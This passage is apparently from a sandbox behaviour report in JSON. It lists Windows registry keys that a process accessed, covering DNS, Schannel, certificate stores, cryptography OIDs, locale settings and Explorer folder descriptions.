"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\System\\DNSClient", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Cryptography\\ECCParameters", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllOpenStoreProv", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllVerifyCertificateChainPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllVerifyCertificateChainPolicy", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime", "HKEY_USERS\\S-1-5-21-3318940731-3379818400-2144845357-1002", "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl" ], "read_keys": [ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description", 